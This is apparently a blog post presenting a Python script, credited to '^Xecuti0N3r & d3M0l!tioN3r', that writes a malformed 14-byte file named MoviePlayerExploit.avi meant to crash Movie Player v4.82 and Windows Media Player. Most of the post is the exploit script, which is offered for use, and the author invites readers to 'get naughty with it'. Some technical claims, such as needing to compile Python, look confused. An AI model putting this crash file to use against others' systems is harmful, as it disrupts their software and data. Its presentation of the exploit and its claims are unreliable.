I came across an interesting buffer overflow exploit which exploits the memory vulnerability in Movie Player and can also be used successfully against Window Media Player. The exploit can be used to perform a Denial of Service attack and causes the application to crash. For those who don't know about Buffer Overflow, can read the article here.

If run properly, many a times, there is a crash every-time whenever the victim opens the folder in which the Exploit is placed. Here is the exploit coded by ^Xecuti0N3r & d3M0l!tioN3r

#!/usr/bin/python

#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit

#(+)Software Link: http://www.movieplay.org/download.php

#(+)Software : Movie Player

#(+)Version : v4.82

#(+)Tested On : WIN-XP SP3

#(+) Date : 31.03.2011

#(+) Hour : 3:37 PM

#Similar Bug was found by cr4wl3r in MediaPlayer Classic print " _______________________________________________________________________";

print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";

print "(+) Software Link: http://www.movieplay.org/download.php";

print "(+) Software : Movie Player";

print "(+) Version : v4.82";

print "(+) Tested On : WIN-XP SP3";

print "(+) Date : 31.03.2011";

print "(+) Hour : 13:37 PM ";

print "____________________________________________________________________

";

import time

time.sleep (2);

print "

Generating the exploit file !!!";

time.sleep (2);

print "



MoviePlayerExploit.avi file generated!!";

time.sleep (2); ExploitLocation = "C:\\MoviePlayerExploit.avi"

f = open(ExploitLocation, "wb")

memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';

f.write(memoryloc)

f.close() print "



(+) Done!

";

print "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;)

";

print "(+) Most of the times there is a crash

whenever you open the folder where the MoviePlayerExploit.avi is stored :D

"; time.sleep (2);

time.sleep (1);

print "





########################################################################

(+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r

";

print "(+)^Xecuti0N3r: E-mail

";

print "(+)d3M0l!tioN3r: E-mail

";

print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r

";

print "########################################################################



";

time.sleep (4);

You need Python to compile it, once compiled, you can test it in a virtual machine. Try opening it using Window Media Player, it will crash instantly. The more ingenious of you can get naughty with it :)

cheers..